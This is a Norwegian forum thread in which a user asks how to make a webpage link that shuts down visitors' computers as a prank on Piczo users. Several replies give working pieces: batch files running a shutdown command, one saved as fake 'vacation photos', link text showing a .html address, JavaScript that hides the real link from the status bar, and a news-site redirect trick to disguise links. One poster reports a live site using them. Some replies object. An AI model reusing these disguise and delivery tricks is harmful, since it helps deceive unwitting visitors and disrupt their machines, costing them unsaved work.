Gå til innhold

Skru av datamaskin med link

Anbefalte innlegg

Hei!

Jeg vet ikke om det er mulig, men går det ann å lage en link på hjemmesiden, som skrur av datamaskinen eller noe liknende?

Edit:

Dette er da hvis en piczo bruker entrer siden min, så blir det en link "Piczo brukere, klikker her" type ting:P

Så om det da kunne skjedd noe morsomt:P

Takk :)

Endret av VisualStudio
Lenke til kommentar
Videoannonse
Annonse

Da må du nok ha en link til et program som lastes ned eller lignende. Eller finne et stort sikkerhetshull i ActiveX eller noe som du kan utnytte..

Med andre ord, for den gjennomsnittlige bruker; nei.

Lenke til kommentar

Da må brukeren godta kjøring av et program.

I Notepad kan du kan lage en fil som du kaller f.eks. "verify.bat", som inneholder flg. kode:

@echo off

shutdown -s

Det er alt som trengs. :) Streng tatt trenger du ikke echo off, men da ser brukeren (hvis han/hun er snar) hva som skjer.

Lenke til kommentar

Hva om disse Piczo-brukerene har lyst å lære seg HTML (evt. XHTML) og CSS, så de vil se i HTML-fila og CSS-fila di da? Veldig synd at den/de person(ene) kanskje hadde trykka på den linken så pc'en deres hadde skrudd seg av.

Jeg ville i hvert fall aldri ha kommet tilbake til sida di da...

Lenke til kommentar

Åpne notisblokk og skriv følgende;

@echo off

shutdown -s -t 10 -c "Pass på hva du laster ned!"

Lagre filen som feriebilder.bat ellerno.

<a href="home.no/bilder/feriebilder.bat">home.no/bilder/feriebilder.html</a>

Et annet tips, er å legge http://go.dagbladet.no/ego.cgi/dbf_oppsl1/ foran en link, slik at de tror at du kommer til dagbladet: http://go.dagbladet.no/ego.cgi/dbf_oppsl1/...owuser=122331&s

Lenke til kommentar

Hvis du vil hindre at home.no/bilder/feriebilder.bat vises i browserens statusfelt nede til venstre, kan du med et lite javascript gjøre det slik:

<html>
<head>
<script>
var statusText=""
function skjulStatus(){
window.status=statusText
return true
}
</script>
</head>
<body>
<a href="home.no/bilder/feriebilder.bat" onMouseover=
"return skjulStatus()">home.no/bilder/feriebilder.html</a>
</body>
</html>

Lenke til kommentar

Kan du ikke heller skrive "Piczo-brukere, dere er dumme? Gå vekk fra siden min?"

Tror det har like stor effekt. Ingen kjører en .bat fil, våkne opp.

MEN, hvis du absolutt må gjøre noe dumt med Piczo brukere, check etter referer med PHP og send header location til disney.com.

Endret av Jonas Drange
Lenke til kommentar

Oki da var det jeg som hadde misforstått, jeg trodde poenget var å finne ut hvem som brukte piczo, ikke hvem som kom til din side via en piczo side.

Jeg tolket piczo brukere som: brukere av tjenesten til piczo.

Så vist jeg kommer til siden din fra en piczo zide så er jeg er en dårligere person og fortjener derfor å få dette her?

Lenke til kommentar
Jeg snakket med NorthGarden på IRC, og han fikset en side hvor han brukte en blanding av mitt og HilRams script, samt backups javascript. http://diversebilder.moo.no/

Det som er problemet her, er at i alle browsere utenom IE, åpnes et nytt vindu hvor en ser kommandoen - som en .txt-fil.

8582990[/snapback]

Testet den i går og som du sier, det funker jo fint i IE. Hvorfor er du så snill og gir de 60 sekunder til å avslutte/lagre? 15 sek burde holde i massevis.

Det at det ikke fungerer i f.eks. Opera, er jo et tegn på at Opera/Firefox fortsatt er hakket bedre en IE på sikkerhet.

Endret av HilRam
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Opprett ny...